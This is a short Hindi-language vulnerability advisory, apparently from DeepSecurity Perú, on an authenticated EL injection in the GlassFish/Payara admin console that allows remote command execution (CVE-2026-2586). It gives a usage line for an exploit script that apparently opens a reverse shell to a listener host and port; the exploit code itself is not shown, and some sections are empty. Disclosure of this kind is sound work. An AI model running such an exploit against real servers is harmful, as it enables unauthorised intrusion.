
प्रमाणित EL इंजेक्शन शोषण GlassFish/Payara एडमिन कंसोल के लिए, जो वर्चुअल सर्वर कॉन्फ़िगरेशन प्रवाह में तैयार किए गए पैरामीटरों के माध्यम से रिमोट कमांड निष्पादन को सक्षम करता है।
GlassFish प्रशासन कंसोल में एक एक्सप्रेशन लैंग्वेज इंजेक्शन भेद्यता एक प्रमाणित उपयोगकर्ता को प्रशासनिक वेब इंटरफ़ेस द्वारा प्रोसेस किए गए पैरामीटरों में दुर्भावनापूर्ण EL एक्सप्रेशन इंजेक्ट करने की अनुमति देती है। सफल शोषण से प्रभावित सर्वर पर दूरस्थ कमांड निष्पादन हो सकता है।
यह भेद्यता सर्वर वर्चुअल कॉन्फ़िगरेशन संपादन प्रवाह में पहचानी गई थी, जहाँ उपयोगकर्ता-नियंत्रणीय पैरामीटरों की व्याख्या एप्लिकेशन द्वारा असुरक्षित रूप से की जाती है।
यह निम्नलिखित कारणों से होता है:
परीक्षण एक स्थानीय और नियंत्रित वातावरण में किया गया था।
CVE-2026-2586.py --url https://glassfish:4848/ --user <USERNAME> --password <PASSWORD> --lhost 127.0.0.1 --lport 4444 --insecure
भेद्य URL:
केवल अधिकृत उपयोग। DeepSecurity Perú अनधिकृत पहुँच का समर्थन नहीं करता है और प्रदान की गई जानकारी के किसी भी दुरुपयोग के लिए कोई ज़िम्मेदारी नहीं लेता है।